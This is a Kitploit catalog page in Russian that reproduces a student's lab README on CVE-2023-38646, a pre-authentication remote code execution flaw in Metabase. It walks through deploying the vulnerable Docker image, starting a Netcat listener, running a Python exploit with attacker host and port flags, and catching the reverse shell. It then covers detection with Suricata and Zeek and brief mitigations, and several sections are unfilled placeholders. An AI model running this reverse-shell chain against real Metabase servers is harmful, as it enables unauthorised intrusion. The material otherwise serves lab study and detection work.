Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Metabase-Pre-Auth-RCE-POC — CVE-2023-38646 | Kitploit
Инструменты/GitHubGitHub/nosrevytsng/metabase-pre-auth-rce-poc
Defensive ToolsVulnerability AnalysisExploitationWeb SecurityPenetration TestingIntrusion DetectionLearning & EducationIncident ResponsePayload Development
GitHubnosrevytsng/metabase-pre-auth-rce-poc

Metabase-Pre-Auth-RCE-POC

CVE-2023-38646

5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2023-38646 — Metabase: Удаленное выполнение кода (RCE) — Доказательство концепции

Обзор

Этот репозиторий документирует проект исследования безопасности в рамках доказательства концепции (PoC), анализирующего CVE-2023-38646 — критическую уязвимость удаленного выполнения кода (RCE) без аутентификации, затрагивающую уязвимые версии Metabase.

Цель этого проекта — продемонстрировать полный жизненный цикл реальной уязвимости, включая:

  • Понимание уязвимости и ее первопричины
  • Воспроизведение эксплойта в контролируемой лабораторной среде
  • Установка обратной оболочки (reverse shell) на уязвимой системе
  • Наблюдение за поведением атаки с помощью инструментов мониторинга сети
  • Демонстрация техник разработки обнаружения
  • Предложение стратегий защитного смягчения

Этот репозиторий предназначен для демонстрации практических навыков в:

  • Исследование уязвимостей
  • Воспроизведение эксплойтов
  • Использование обратных оболочек
  • Анализ сетевого трафика
  • Системы обнаружения вторжений
  • Стратегии смягчения угроз безопасности

Описание уязвимости

CVE-2023-38646 — это критическая уязвимость, затрагивающая определенные версии Metabase, платформы бизнес-аналитики и аналитики с открытым исходным кодом.

Уязвимость позволяет злоумышленнику достичь неаутентифицированного удаленного выполнения кода путем эксплуатации слабых мест в процессе установки или настройки приложения.

Ключевые детали:

  • CVE ID: CVE-2023-38646
  • Серьезность: Критическая
  • Оценка CVSS: 9.8
  • Вектор атаки: Сеть
  • Требуется аутентификация: Нет
  • Воздействие: Удаленное выполнение кода (RCE)

Успешная эксплуатация позволяет злоумышленнику:

  • Выполнять произвольные команды на целевой системе
  • Установить обратную оболочку
  • Потенциально получить полный контроль над системой

Официальные ссылки:

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://www.metabase.com/

Используемые технологии и инструменты

Этот проект объединяет как инструменты наступательной безопасности, так и инструменты защитного мониторинга.

Наступательная безопасность

  • Python
  • Полезные нагрузки обратной оболочки
  • Пользовательский скрипт эксплойта
  • Уязвимый экземпляр Metabase

Обнаружение и мониторинг

  • Suricata — Система обнаружения вторжений (IDS)
  • Zeek — Мониторинг сетевой безопасности (NSM)

Защитные технологии

  • ModSecurity — Межсетевой экран веб-приложений
  • OSSEC — Система обнаружения вторжений на уровне хоста

Лабораторная среда

Заполнитель — опишите вашу лабораторную установку

Пример:

  • Атакующая машина: Kali Linux
  • Целевая машина: Уязвимый сервер Metabase
  • Машина мониторинга сети: Виртуальная машина мониторинга безопасности

Эксплуатация PoC

Диаграмма цепочки атаки

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Vulnerable Metabase Instance]
    B --> C[CVE-2023-38646 Exploit]
    C --> D[Remote Code Execution]
    D --> E[Reverse Shell Established]
    E --> F[Command Execution on Target]

Эта диаграмма иллюстрирует высокоуровневый поток атаки, используемый в этом проекте.

Настройка доказательства концепции (PoC)

Установка и настройка Docker:

root@kitploit:~
sudo apt update
sudo apt upgrade -y

sudo apt install docker.io -y

sudo systemctl start docker 
sudo systemctl enable docker

sudo docker run hello-world

Запуск Docker:

Уязвимый экземпляр Metabase Enterprise (v1.44.0) был развернут с помощью Docker.

root@kitploit:~
sudo docker run -d -p 3000:3000 --name metabase-enterprise metabase/metabase-enterprise:v1.44.0

Это открывает веб-интерфейс Metabase на порту 3000, обеспечивая доступ к странице настройки.

Если Docker уже запущен, выполните следующие команды, чтобы начать заново:

root@kitploit:~
sudo docker stop metabase-enterprise
sudo docker rm metabase-enterprise

Заполнитель 'Настройка Docker'

После запуска контейнера интерфейс Metabase становится доступным через браузер.

root@kitploit:~
    http://0.0.0.0:3000/setup -or- http://127.0.0.1:3000/setup

Страница настройки подтверждает, что экземпляр Metabase активен и готов к конфигурации.

Сценарий эксплуатации 1

BurpSuite

Демонстрация / Документация

Заполнитель для скриншотов или объяснения

Сценарий эксплуатации 2 - Эксплойт на Python

  1. Подготовка слушателя обратной оболочки

Перед запуском эксплойта на атакующей машине запускается слушатель Netcat для приема подключения обратной оболочки.

root@kitploit:~
    nc -lvnp 6666

Этот слушатель ожидает входящие подключения от эксплуатируемого сервера Metabase.

Заполнитель для скриншотов или объяснения

  1. Выполнение эксплойта

Скрипт эксплойта выполняется с атакующей машины.

root@kitploit:~
    python3 CVE-2023-38646-Reverse-Shell.py \   ---> Exploit Name
    --rhost http://192.168.1.136:3000 \         ---> Targer IP Address
    --lhost 192.168.1.137 \                     ---> Attacker's IP Address
    --lport 6666                                ---> Attacker's Listening Port

Полезная нагрузка выполняет команду, которая устанавливает обратную оболочку к атакующей машине.

  1. Обратная оболочка установлена

После успешного выполнения полезной нагрузки уязвимый экземпляр Metabase инициирует подключение обратно к атакующей машине.

Слушатель Netcat принимает подключение, предоставляя злоумышленнику доступ к оболочке системы.

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$

Для подтверждения подключения к устройству жертвы:

root@kitploit:~
    whoami

Вывод:

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$ whoami
    whoami
    metabase
    bash-5.1$

Обнаружение PoC

Этот проект также демонстрирует, как активность эксплуатации может быть обнаружена с помощью инструментов мониторинга сети.

Обнаружение с помощью Suricata

Suricata (IDS) использовалась для мониторинга сетевого трафика на предмет подозрительных шаблонов, связанных с эксплойтом.

root@kitploit:~
sudo suricata -i eth0

Заполнитель: вставьте скриншот срабатывания Suricata

root@kitploit:~
evidence/detection/suricata_alert.png

Для наблюдения за срабатываниями в реальном времени логи Suricata отслеживались с помощью:

root@kitploit:~
tail -f /var/log/suricata/fast.log

Заполнитель: вставьте скриншот лога Suricata

root@kitploit:~
evidence/detection/suricata_log.png

Для пассивного подхода использовался пользовательский скрипт уведомлений, который генерировал всплывающие предупреждения на рабочем столе при обнаружении подозрительного трафика Suricata.

root@kitploit:~
nohup ./suricata-popup-alert.sh >/dev/null 2>&1 &

При выполнении эксплойта Suricata генерировала срабатывания, указывающие на подозрительную активность, связанную с попыткой эксплуатации Metabase.

Заполнитель: вставьте скриншот лога Suricata

root@kitploit:~
evidence/detection/suricata_noti.png

Пример:

Заполнитель: вставьте скриншот лога Suricata

root@kitploit:~
evidence/detection/suricata_noti.png

Анализ сети с помощью Zeek

В дополнение к мониторингу IDS, Zeek использовался для анализа сетевого трафика и выявления аномального поведения.

Zeek запускается с помощью следующих команд, чтобы начать захват и анализ сетевого трафика:

root@kitploit:~
sudo /usr/local/zeek/bin/zeek -i eth0

Заполнитель: вставьте скриншот запуска Zeek

root@kitploit:~
evidence/detection/zeek.png

Просматривая журналы соединений, можно наблюдать трафик обратной оболочки на порту 6666.

root@kitploit:~
192.168.1.136 → 192.168.1.137:6666

Заполнитель: вставьте скриншот лога Zeek

root@kitploit:~
evidence/detection/zeek_log.png

Смягчение и защитные стратегии

Несколько стратегий смягчения могут снизить риск эксплуатации.

СтратегияОписание
Управление исправлениямиОбновите Metabase до версии, которая исправляет CVE-2023-38646
Межсетевой экран веб-приложений (ModSecurity)Фильтрация вредоносных HTTP-запросов

Структура репозитория

root@kitploit:~
cve-2023-38646-metabase-rce-research
│
├── exploit
│   └── metabase_reverse_shell.py
│
├── detection
│   ├── suricata
│   └── zeek
│
├── evidence
│   ├── exploitation
│   ├── detection
│   └── mitigation
│
├── docs
│   ├── report
│   └── presentation
│
└── demo

Резюме

Этот проект демонстрирует полный жизненный цикл анализа и воспроизведения реальной критической уязвимости.

PoC демонстрирует:

  • анализ уязвимостей
  • воспроизведение эксплойтов
  • выполнение обратной оболочки
  • мониторинг сетевого трафика
  • обнаружение вторжений
  • стратегии защитного смягчения

Цель этого репозитория — предоставить техническое исследование, иллюстрирующее как наступательные, так и защитные практики кибербезопасности.


🖋️ Автор

Styverson Ng

Бакалавр информационных технологий
Искусственный интеллект и автономные системы
Кибербезопасность и компьютерная криминалистика

Университет Мердока

Скачать инструмент
Обнаружение вторжений на хосте (OSSEC)Мониторинг подозрительного поведения системы
Сетевой мониторинг (Suricata & Zeek)Обнаружение аномальных шаблонов трафика